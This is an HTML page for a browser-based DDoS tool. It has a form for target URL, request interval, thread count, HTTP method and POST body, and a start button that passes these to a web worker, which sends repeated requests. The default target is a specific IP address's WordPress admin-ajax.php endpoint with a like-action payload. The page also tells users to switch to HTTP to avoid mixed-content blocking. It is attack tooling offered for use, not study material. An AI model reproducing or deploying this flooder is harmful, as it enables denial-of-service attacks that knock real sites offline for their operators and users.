<!DOCTYPE html>

<html lang="zh-cn">

<head>
    <title>Frontend-Based DDoS</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <style>
        input[type*="text"],
        textarea {
            width: 384px;
        }

        label {
            display: inline-block;
            width: 72px;
        }

        a:visited {
            color: rgb(0, 0, 238);
        }
    </style>
</head>

<body>
    <div>
        <h1>Frontend-Based DDoS</h1>
        <p>This seemed to be in fashion in 2017 but may be still <b>useful</b> today.</p>
        <p>This page is trying to implement it using the new
            <code>fetch</code> and <code>web worker</code> APIs.</p>
        <p><b>Tip</b>: try to load this page in <a id="redirect" href="javascript:void(0)">HTTP</a>, because it is
            banned
            to visit
            another HTTP site from an HTTPS one.</p>
        <script>
            document.getElementById('redirect').addEventListener('click', () => {
                var url = window.location.href;
                if (url.match('https') !== null) {
                    window.location.href = url.replace('https', 'http');
                }
            });
        </script>
    </div>
    <div>
        <label>target </label><input type="text" id="target"
            value="http://104.224.188.179/wp-admin/admin-ajax.php" /><br />
        <label>interval </label><input type="text" id="interval" value="1000" /><br />
        <label>threads</label><input type="text" id="thread" value="1" /><br />
        <label>method</label><select id="method">
            <option>GET</option>
            <option selected>POST</option>
        </select><br />
        <label id="postdatalabel">postdata</label><textarea id="postdata">action=wpcom_like_it&id=72</textarea><br />
        <input type="button" value="start" id="start" />
        <input type="button" value="stop" id="stop" />
        <br />
        <label id="count">0</label>
    </div>
    <script>
        var worker = new Worker('worker.js');
        document.getElementById('start').addEventListener('click', () => {
            var target = document.getElementById('target').value;
            var interval = Number(document.getElementById('interval').value) || 1;
            var threads = Number(document.getElementById('thread').value) || 1;
            var method = document.getElementById('method').value;
            var postdata = document.getElementById('postdata').value;
            worker.postMessage({
                action: 'start',
                target: target,
                interval: interval,
                threads: threads,
                method: method,
                postdata: postdata
            });
        });
        document.getElementById('stop').addEventListener('click', () => {
            worker.postMessage({
                action: 'stop'
            });
        });
        document.getElementById('method').addEventListener('change', (e) => {
            var method = e.target.value;
            if (method === 'GET') {
                document.getElementById('postdatalabel').style =
                    document.getElementById('postdata').style = 'display: none';
            } else if (method === 'POST') {
                document.getElementById('postdatalabel').style =
                    document.getElementById('postdata').style = '';
            }
        });
        worker.onmessage = e => {
            var data = e.data;
            if (data.action === 'count') {
                document.getElementById('count').innerText = data.count;
            }
        };
    </script>
</body>

</html>